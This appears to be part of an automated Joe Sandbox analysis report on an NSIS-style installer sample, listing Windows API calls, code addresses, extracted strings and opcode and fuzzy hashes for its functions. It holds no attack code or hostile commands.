                                                                                                                                                                                              • Opcode Fuzzy Hash: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7761BEB1900209BFDB009F60DD85EAA7B69FB85305F00843AF705B62D0D77D9961CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                              • DrawTextW.USER32(00000000,00472EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                              • Opcode ID: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                              • Instruction ID: 4eb8147a30471c2b969484520d7d1b1c24976f3a1718a772f7b725b3b94c1b26
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C418A71800249AFCF058FA5DE459AF7BB9FF44314F00842AF991AA1A0C778D954DFA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,004688E8,00000400), ref: 00405F4A
                                                                                                                                                                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,004690E8,00000400), ref: 00405F67
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004690E8,C0000000,00000004,004690E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004684E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                                                              • Opcode ID: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                              • Instruction ID: 1ccef14564d3a4e3590f6d96bf23d62cdd24cd7414a0bd79904b9c13782922cd
                                                                                                                                                                                              • Opcode Fuzzy Hash: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08312530641B05BBC220AB659D48F6B3AACDF45744F15003FFA42F72C2EB7C98118AAD
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                              • lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                              • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\
                                                                                                                                                                                              • API String ID: 2531174081-796932600
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                              • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D0), ref: 00401E3E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                                                                              • API String ID: 3808545654-76309092
                                                                                                                                                                                              • Opcode ID: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                              • Instruction ID: 2f87ef527a079fcd98b3174ff93e15f92fad6858fb92d4176ae60913c966d855
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A01B575604240BFE700ABF1AE0ABDD7FB5AB55309F10887DF641B61E2DA7840458B2D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                              • MulDiv.KERNEL32(0505BB1A,00000064,0505D940), ref: 00402E3C
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                                              • Opcode ID: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                              • Instruction ID: dfd142ddc65d39fdaa73b229a9921dc7c235b7e072e3123d651e00bd55f03bcf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60014F7164020CABEF209F60DE49FAE3B69AB44304F008439FA06B51E0DBB895558B98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                              • Opcode ID: 119b9e301f9c75836b9179208c0dbdb6f02c12704b392f46658d181c58c9b0fc
                                                                                                                                                                                              • Instruction ID: 85d8fb478e53a7d33050a02afe9876517184a336e4e72b82bbd0c3cba42884f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 119b9e301f9c75836b9179208c0dbdb6f02c12704b392f46658d181c58c9b0fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D121AEB1800128BBDF116FA5DE89DDE7E79EF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                              • CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                              • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                              • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp$C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll
                                                                                                                                                                                              • API String ID: 3109718747-3977801443
                                                                                                                                                                                              • Opcode ID: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                              • Instruction ID: b23dc685b5da5394ac89c8ab13f2cbf985e24fd8d9932a4f5164fd221fdd45c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76110B72A04201BADB146FF18E89A9F76659F44398F204C3FF102F61D1EAFC89415B5D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                              • Opcode ID: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                              • Instruction ID: d9fd13ec482603559a9c09f77eb5ae76b99fbdc016b4c624d38ebcad95bf5f4c
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F61A0CA749D519B78
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                                              • Opcode ID: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                              • Instruction ID: 65d6ef813479b3ccfd969ec0db039784a4d8c6b5967a53089d3579ec78c560c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                              • Instruction Fuzzy Hash: 401193736041282ADB00656D9C45F9E369C9B85334F25423BFA65F21D1E979D82582E8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                              • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                              • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                              • Opcode ID: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                              • Instruction ID: 9c0cd9c85579b1f1539786df4f617efd254904ce91a486f6a135d178cfad0ab8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF05E30485630EBD6506B20FE0CACB7BA5FB84B41B0149BAF005B11E4D7B85880CBDC
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                              • Opcode ID: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                              • Instruction ID: 334c9fee3abb3f39d596823d3a3537c7effd0098edc8ca0b3d981ed7cb288a41
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9015A31100709ABEB205F51DD94A9B3B26EB84795F20507AFA007A1D1D7BA9C919E2E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,?,00000000,?,?,Remove folder: ,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 004061D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                              • String ID: Remove folder:
                                                                                                                                                                                              • API String ID: 3356406503-1958208860
                                                                                                                                                                                              • Opcode ID: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                              • Instruction ID: 8659262355d6ebf2290daf59b07b2549fc881bd87fa0bb5ea6267207f8cb0b09
                                                                                                                                                                                              • Opcode Fuzzy Hash: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68017C72500209EADF218F51DD09EDB3BB8EF55364F01403AFE16A61A1D378DA64EBA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00468250,Error launching installer), ref: 004058CC
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                              • String ID: Error launching installer
